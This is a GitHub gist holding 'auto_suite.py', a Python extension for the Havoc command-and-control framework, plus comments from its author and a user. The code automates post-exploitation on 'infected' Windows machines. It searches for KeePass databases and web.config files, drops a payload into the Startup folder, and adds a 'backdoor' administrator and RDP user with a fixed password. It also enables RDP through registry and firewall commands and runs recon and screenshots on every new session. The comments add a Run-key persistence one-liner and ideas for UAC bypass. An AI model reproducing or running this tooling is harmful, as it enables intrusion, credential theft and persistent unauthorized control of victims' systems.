-
-
Save p4p1/e24bca8407d69c8ea28d4bc9d423f85b to your computer and use it in GitHub Desktop.
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| # Made by papi | |
| # Created on: Di 10 Okt 2023 01:54:42 CEST | |
| # auto_suite.py | |
| # Description: | |
| # A havoc extention to search for files inside of infected agents | |
| # Usage: | |
| # To use this script save it on your machine and add it to the script manager of Havoc | |
| # inside of: Scripts > Scripts Manager > Load Script | |
| import os | |
| import subprocess | |
| from shutil import which | |
| import havocui | |
| import havoc | |
| auto_search = havocui.Widget("Auto Search", True) | |
| auto_recon = havocui.Widget("Auto Recon", True) | |
| auto_persist = havocui.Widget("Auto Persist", True) | |
| auto_GUI = havocui.Widget("Auto rdp", True) | |
| demons = [] | |
| # auto search vars | |
| selecte_demon = None | |
| dir_to_search="C:\\\\" | |
| powershell = False | |
| batch = False | |
| text_files = False | |
| exe_files = False | |
| WebConf = False | |
| Keypass = False | |
| # auto persist vars | |
| local_payload_path = "" | |
| shell_startup = False | |
| backdoor_user = False | |
| # auto recon vars | |
| auto_custompowershell = False | |
| auto_custompowershell_cmd = "" | |
| auto_bofbelt = False | |
| auto_password_policy = False | |
| auto_scrot = False | |
| # auto GUI vars | |
| username="backdoor" | |
| password="password123" | |
| domain="" | |
| dynamic_resolution=True | |
| admin_mode_gui=False | |
| disable_ssl_security=True | |
| set_firewall_and_task=True | |
| # ... Auto GUI section ... | |
| def set_username_gui(text): | |
| global username | |
| username = text | |
| def set_password_gui(text): | |
| global password | |
| password = text | |
| def set_domain_gui(text): | |
| global domain | |
| domain = text | |
| def set_dynamic_resultion(): | |
| global dynamic_resolution | |
| dynamic_resolution = not dynamic_resolution | |
| def set_ssl_security(): | |
| global disable_ssl_security | |
| disable_ssl_security = not disable_ssl_security | |
| def set_admin_mode(): | |
| global admin_mode_gui | |
| admin_mode_gui = not admin_mode_gui | |
| def set_set_firewall(): | |
| global set_firewall_and_task | |
| set_firewall_and_task = not set_firewall_and_task | |
| def open_autogui(): | |
| auto_GUI.clear() | |
| if which("xfreerdp") == None: | |
| auto_GUI.addLabel("<h3 style='color:#ff0000'>You are missing the XFREERDP package please install it to use this functionality</h3>") | |
| else: | |
| auto_GUI.addLabel("<h3 style='color:#bd93f9'>Settings of autordp command</h3>") | |
| auto_GUI.addLabel("<h6 style='color:#ff0000'>[!] means you need admin priv</h6>") | |
| auto_GUI.addLabel("<span style='color:#71e0cb'>username:</span>") | |
| auto_GUI.addLineedit(username, set_username_gui) | |
| auto_GUI.addLabel("<span style='color:#71e0cb'>password:</span>") | |
| auto_GUI.addLineedit(password, set_password_gui) | |
| auto_GUI.addLabel("<span style='color:#71e0cb'>domain:</span>") | |
| auto_GUI.addLineedit(domain, set_domain_gui) | |
| auto_GUI.addLabel("<span style='color:#71e0cb'>options:</span>") | |
| auto_GUI.addCheckbox("dynamic resolution", set_dynamic_resultion, dynamic_resolution) | |
| auto_GUI.addCheckbox("dissable ssl", set_ssl_security, disable_ssl_security) | |
| auto_GUI.addCheckbox("admin mode", set_admin_mode, admin_mode_gui) | |
| auto_GUI.addCheckbox("[!] add firewall rule and activate rdp (remote machine)", set_set_firewall, set_firewall_and_task) | |
| auto_GUI.setSmallTab() | |
| def run_autogui(demonID, *param): | |
| TaskID : str = None | |
| demon : Demon = None | |
| cmd = "" | |
| demon = havoc.Demon(demonID) | |
| print(domain) | |
| if domain != "": | |
| cmd = "bash -c \"yes | xfreerdp /u:%s\\%s /p:%s /v:%s" % (domain, username, password, demon.InternalIP) | |
| else: | |
| cmd = "bash -c \"yes | xfreerdp /u:%s /p:%s /v:%s" % (username, password, demon.InternalIP) | |
| if disable_ssl_security: | |
| cmd += " /tls-seclevel:0" | |
| if dynamic_resolution: | |
| cmd += " /dynamic-resolution" | |
| if admin_mode_gui: | |
| cmd += " /admin" | |
| cmd += "\"" | |
| TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Running: %s" % cmd ) | |
| if set_firewall_and_task: | |
| demon.Command(TaskID, "shell reg add \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f") | |
| demon.Command(TaskID, "shell netsh advfirewall firewall set rule group=\"remote desktop\" new enable=yes") | |
| subprocess.Popen(cmd, shell=True) | |
| return TaskID | |
| # ... Auto Search section... | |
| def set_directory(text): | |
| global dir_to_search | |
| dir_to_search = text | |
| def slct_powershell(): | |
| global powershell | |
| powershell = not powershell | |
| def slct_batch(): | |
| global batch | |
| batch = not batch | |
| def slct_exe(): | |
| global exe_files | |
| exe_files = not exe_files | |
| def slct_text(): | |
| global text_files | |
| text_files = not text_files | |
| def slct_webconf(): | |
| global WebConf | |
| WebConf = not WebConf | |
| def slct_Key(): | |
| global Keypass | |
| Keypass = not Keypass | |
| def select_widget(num): | |
| global powershell | |
| global selecte_demon | |
| global demons | |
| if num != 0: | |
| selecte_demon = havoc.Demon(demons[num - 1]) | |
| def run_search(): | |
| global powershell | |
| global selecte_demon | |
| global text_files | |
| global WebConf | |
| global Keypass | |
| global batch | |
| global exe_files | |
| global dir_to_search | |
| if selecte_demon is None: | |
| havocui.errormessage("You have not selected a demon! Please select one or start infecting machines if none are present in the drop down.") | |
| return | |
| TaskID = selecte_demon.ConsoleWrite( selecte_demon.CONSOLE_TASK, "Tasked demon to Find files" ) | |
| if powershell: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.ps1 -Recurse\"" % dir_to_search) | |
| if batch: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.bat -Recurse\"" % dir_to_search) | |
| if text_files: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.txt -Recurse\"" % dir_to_search) | |
| if WebConf: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *web.config -Recurse\"" % dir_to_search) | |
| if Keypass: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.kdbx -Recurse\"" % dir_to_search) | |
| if exe_files: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.exe -Recurse\"" % dir_to_search) | |
| return TaskID | |
| def open_autosearch(): | |
| auto_search.clear() | |
| global demons | |
| demons = havoc.GetDemons() | |
| auto_search.addLabel("<h3 style='color:#bd93f9'>Select a demon to search files on</h3>") | |
| auto_search.addCombobox(select_widget, "select demon", *demons) | |
| auto_search.addLabel("<span style='color:#71e0cb'>Folder to start search:</span>") | |
| auto_search.addLineedit(dir_to_search, set_directory) | |
| auto_search.addLabel("<span style='color:#71e0cb'>File types:</span>") | |
| auto_search.addCheckbox("powershell files (*.ps1)", slct_powershell, powershell) | |
| auto_search.addCheckbox("batch files (*.bat)", slct_batch, batch) | |
| auto_search.addCheckbox("text files (*.txt)", slct_text, text_files) | |
| auto_search.addCheckbox("web.config files (*web.config)", slct_webconf, WebConf) | |
| auto_search.addCheckbox("KeePass Database files (*.kdbx)", slct_Key, Keypass) | |
| auto_search.addCheckbox("Executable files (*.exe)", slct_exe, exe_files) | |
| auto_search.addButton("Start search!", run_search) | |
| auto_search.setSmallTab() | |
| # ... Auto Persist section ... | |
| def set_payload_path(data): | |
| global local_payload_path | |
| local_payload_path = data | |
| print(data) | |
| def slct_user_startup(): | |
| global shell_startup | |
| shell_startup = not shell_startup | |
| def slct_backdoor_user(): | |
| global backdoor_user | |
| backdoor_user = not backdoor_user | |
| def run_persist(): | |
| global selecte_demon | |
| global local_payload_path | |
| global shell_startup | |
| if selecte_demon is None: | |
| havocui.errormessage("You have not selected a demon! Please select one or start infecting machines if none are present in the drop down.") | |
| return | |
| TaskID = selecte_demon.ConsoleWrite( selecte_demon.CONSOLE_TASK, "Tasked demon to persist itself" ) | |
| if shell_startup: | |
| selecte_demon.Command(TaskID, "powershell \"[Environment]::GetFolderPath([Environment+SpecialFolder]::CommonStartup) | cd\"") | |
| selecte_demon.Command(TaskID, "upload %s" % local_payload_path) | |
| if backdoor_user: | |
| selecte_demon.Command(TaskID, "shell net user backdoor password123 /add") | |
| selecte_demon.Command(TaskID, "shell net localgroup \"Administrators\" backdoor /add") | |
| selecte_demon.Command(TaskID, "shell net localgroup \"Remote Desktop Users\" backdoor /add") | |
| return TaskID | |
| def open_autopersist(): | |
| auto_persist.clear() | |
| global demons | |
| demons = havoc.GetDemons() | |
| auto_persist.addLabel("<h3 style='color:#bd93f9'>Select a demon to set persistance on</h3>") | |
| auto_persist.addCombobox(select_widget, "select demon", *demons) | |
| auto_persist.addLabel("<span style='color:#71e0cb'>Path of payload on attacking end:</span>") | |
| auto_persist.addLineedit("/home/user/payload.exe", set_payload_path) | |
| auto_persist.addLabel("<span style='color:#71e0cb'>Persistance type:</span>") | |
| auto_persist.addCheckbox("shell:startup", slct_user_startup, shell_startup) | |
| auto_persist.addCheckbox("backdoor user", slct_backdoor_user, backdoor_user) | |
| auto_persist.addButton("Persist!", run_persist) | |
| auto_persist.setSmallTab() | |
| # ... Auto recon section ... | |
| def slct_bofbelt(): | |
| global auto_bofbelt | |
| auto_bofbelt = not auto_bofbelt | |
| def run_bofbelt(identifier): | |
| demon = havoc.Demon(identifier) | |
| TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run bofbelt" ) | |
| demon.Command(TaskID, "bofbelt") | |
| def slct_scrot(): | |
| global auto_scrot | |
| auto_scrot = not auto_scrot | |
| def run_scrot(identifier): | |
| demon = havoc.Demon(identifier) | |
| TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run screenshot" ) | |
| demon.Command(TaskID, "screenshot") | |
| def slct_pwpolicy(): | |
| global auto_password_policy | |
| auto_password_policy = not auto_password_policy | |
| def run_pwpolicy(identifier): | |
| demon = havoc.Demon(identifier) | |
| TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run get_password_policy" ) | |
| demon.Command(TaskID, "get_password_policy") | |
| def run_custpowershell(identifier): | |
| global auto_custompowershell_cmd | |
| demon = havoc.Demon(identifier) | |
| TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run get_password_policy" ) | |
| demon.Command(TaskID, "powershell \"%s\"" % auto_custompowershell_cmd) | |
| def set_powershell(text): | |
| global auto_custompowershell | |
| global auto_custompowershell_cmd | |
| if len(text) > 0: | |
| auto_custompowershell = True | |
| auto_custompowershell_cmd = text | |
| def save_autorecon(): | |
| global auto_bofbelt | |
| global auto_password_policy | |
| global auto_scrot | |
| global auto_custompowershell | |
| event = havoc.Event("events") | |
| if auto_bofbelt: | |
| event.OnNewSession(run_bofbelt) | |
| if auto_password_policy: | |
| event.OnNewSession(run_pwpolicy) | |
| if auto_scrot: | |
| event.OnNewSession(run_scrot) | |
| if auto_custompowershell: | |
| event.OnNewSession(run_custpowershell) | |
| auto_recon.addLabel("<h3 style='color:#bd93f9'>Run commands on new session</h3>") | |
| auto_recon.addLabel("<span style='color:#71e0cb'>Pre-defined commands:</span>") | |
| auto_recon.addCheckbox("bofbelt (seat belt recon tool)", slct_bofbelt, auto_bofbelt) | |
| auto_recon.addCheckbox("get_password_policy", slct_pwpolicy, auto_password_policy) | |
| auto_recon.addCheckbox("screenshot", slct_scrot, auto_scrot) | |
| auto_recon.addLabel("<span style='color:#71e0cb'>Custom powershell command:</span>") | |
| auto_recon.addLineedit("Get-ChildItem...", set_powershell) | |
| auto_recon.addButton("Save", save_autorecon) | |
| def open_autorecon(): | |
| auto_recon.setSmallTab() | |
| if not which("xfreerdp") == None: | |
| havoc.RegisterCommand( run_autogui, "", "autordp", "Connect to the machine using xfreerdp.", 0, "", "" ) | |
| save_autorecon() | |
| havocui.createtab("Auto Suite", "Auto search", open_autosearch, "Auto recon", open_autorecon, "Auto persist", open_autopersist, "Auto rdp", open_autogui) |
p4p1
commented
Oct 20, 2023
•
Hello, thank you for such great script, can you help plz with Autopersist extension usage.
I try different variants of path where my payload is stored on target machine, but still no execution (backslashes in all ways, with or without C: and many other . with shell checked , without checked)
for example it stored on C:\Users\Mister\Documents\putty.exe
what path should i enter ? (also i am in runtime broker and it sometimes provoke a errors with get env and user info)
manually i successfully add putty persist) with -
Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'MyUserTask' -Value "$env:USERPROFILE\Documents\putty.exe"; Start-Process "$env:USERPROFILE\Documents\putty.exe"
@hastalamuerte So currently the path you would put inside of the auto persist extension would be your local path for the demon and not the path on the victim machine since the path that is used on the victim machine is the following and can't be changed:
[Environment]::GetFolderPath([Environment+SpecialFolder]::CommonStartup)
But I don't see why I couldn't add a way to specify a folder since that would be cool. Currently for all of the Havoc extensions I am taking a small break since I'm focusing on certificates (mainly OSEP) and I'm waiting for the big front-end api change that 5pider mentioned on his twitter since once that hits I'll update all of the extensions I maintain to use the new API calls. I might add your feature over the next few months since I'd use it for doing zephyr and then OSEP no promises thow for now since I'm quite busy. I also wanted to add sections in auto persist for creating like a service that starts on boot with the exe and other things of the such. I'll use this comment as a todo list and make an alert in my general personal todo list to do them at some point I'll also do a comment where I tag you once I'm done implementing them at some point. Also feel free to reach out if you just need it quick and want to implement it yourself :)
Todo Idea for the future
- @hastalamuerte idea's with custom paths for persistance
- shortcut / lnk file system for custom paths and add the link to the shell:startup path if checked in the menu
- Service system with auto start the service with the exe.
Thanks for answer! Wish a good luck with OSEP. Me too in wait for havoc rewrite.
Seems i was miss attacking/attackers machine - repeat it with selfhosted payload (both methods), receive only Access Denied for User.
(Set-ItemProperty -Path 'HKCU:\Soft.... Still work for User with no Admin or some other privs like selfimpersonate , its win 10 test machine with account on one drive, so i see that many of methods and tool not work on that env) -but maybe that technique deserve to be in
Cause low code, i can just advice some logic that possible may be helpful -
Something like individual trays/chains with checkboxes for 1. New User 2. New Admin 3. Manual .
Payload - Target / Stored / Remote + to add files in chain, for dll sideloading etc .
Output folder .
Elevate/Uac - 1 Technique 2 Path https://github.com/icyguider/UAC-BOF-Bonanza there is havoc script / potatos
And maybe add a option to add commands (like recon, or integrate him), even between steps (yep oneliners is cool , but sometimes syntax broke all) , and not only powershell command on start, like extensions/modules commands - for ex run "uac-bypass elevatedcom file.exe" "dll spawn explorer exe" .
So if rightly setup unpriv and priv chains it might be fully auto c2)
(upd. i found session.Elevated and Session.OS in havoc Packager.cc and Elevated / "Elevated": Agent.Info.Elevated in demons.go, hope it will help to identify privileges on demon initial to understand what commands list send to it) - will try to implement in py (upd. -fail seems havoc dont understand that , or i code wrong. Panel can understand what kind of demon/user it is .. so possible script can.)